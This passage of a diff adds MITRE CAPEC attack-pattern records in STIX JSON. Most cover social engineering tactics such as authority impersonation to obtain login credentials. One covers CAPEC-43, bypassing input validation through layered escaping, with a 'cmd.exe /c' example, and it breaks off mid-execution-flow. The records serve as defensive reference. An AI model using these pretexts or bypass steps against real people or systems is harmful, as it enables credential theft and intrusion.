availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary sends an email to a target about a limited-time opportunity to claim a considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ee824b4-e2c0-4406-b7d9-9455b31c810c", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. 
There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-421", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/421.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Authority", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an 
application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The adversary calls the target and announces that they are the head of IT at the target's company. The adversary goes on to say that there has been a technical issue and they need the target's login credentials for their account. By convincing the target of their authority, the adversary hopes the target will reveal the sensitive information." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e7aab7-ed20-4616-ae8f-4708e16de84c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. 
After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.", + "external_references": [ + { + "external_id": "CAPEC-422", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/422.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Influence Perception of Commitment and Consistency", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of 
how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d680be2b-c855-49c2-9b1f-929dd51b97e4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Individuals should avoid complying with suspicious requests.", + "id": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-422-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36560036-998b-4d8b-8e16-e766cd8d1876", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "spec_version": "2.1", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate themself with the target via actions, appearance, or a combination thereof.", + "external_references": [ + { + "external_id": "CAPEC-423", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/423.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Liking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an 
action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3cc5859-4cd7-4218-ad1f-c7047264db33", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. 
The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-424", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/424.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Consensus or Social Proof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in 
some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e6e89355-28b2-4f0e-be9d-bdaab0213673", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary's point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary's perspective. One technique of framing is to avoid the use of the word \"No\" and to contextualize responses in a manner that is positive. 
When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-425", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/425.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Target Influence via Framing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5843921-552b-4480-815d-43dc331c44bd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication.", + "id": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-425-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5f246e08-06d0-46f0-a49f-061d90062966", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "spec_version": "2.1", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary incites a behavior from the 
target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target's morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target's vulnerability to particular incentives.", + "external_references": [ + { + "external_id": "CAPEC-426", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/426.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Incentives", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that 
negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6433a46-1658-4501-a2d5-69157cd29ad6", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary shapes the target's actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. 
In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.", + "external_references": [ + { + "external_id": "CAPEC-427", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/427.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Psychological Principles", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", 
+ "x_capec_parent_of_refs": [ + "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c110197f-03b6-4bd2-8fc6-22c90a73c5e9", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. 
When skillfully employed, the target is likely to be unaware that they are being manipulated.", + "external_references": [ + { + "external_id": "CAPEC-428", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/428.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Influence via Modes of Thinking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary gains information via non-verbal means from the target through eye movements.", + "external_references": [ + { + "external_id": "CAPEC-429", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/429.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Target Influence via Eye Cues", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + 
"x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a \"layer\" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: --> --> . 
In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.", + "external_references": [ + { + "external_id": "CAPEC-43", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/43.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploiting Multiple Input Interpretation Layers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to \"double escape\" the backslash. In some cases, a quadruple escape is necessary.\n Original String: C:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\cmd.exe /c\n \n Interim String: C:\\\\winnt\\\\system32\\\\cmd.exe /c\n \n Final String: C:\\winnt\\system32\\cmd.exe /c\n This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.\n [REF-1]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application/system inputs where bypassing input validation is desired: The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where they want to bypass it.

  2. Techniques
    While using an application/system, the attacker discovers an input where validation is stopping them from performing some malicious or unauthorized actions.

Experiment

  1. Determine which character encodings are accepted by the application/system: The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly.

  2. Techniques
    Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\\'
    Determine whether URL encoding is accepted by the application/system.
    Determine whether UTF-8 encoding is accepted by the application/system.
    Determine whether UTF-16 encoding is accepted by the application/system.
    Determine if any other encodings are accepted by the application/system.
  3. Combine multiple encodings accepted by the application.: The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.

  4. Techniques
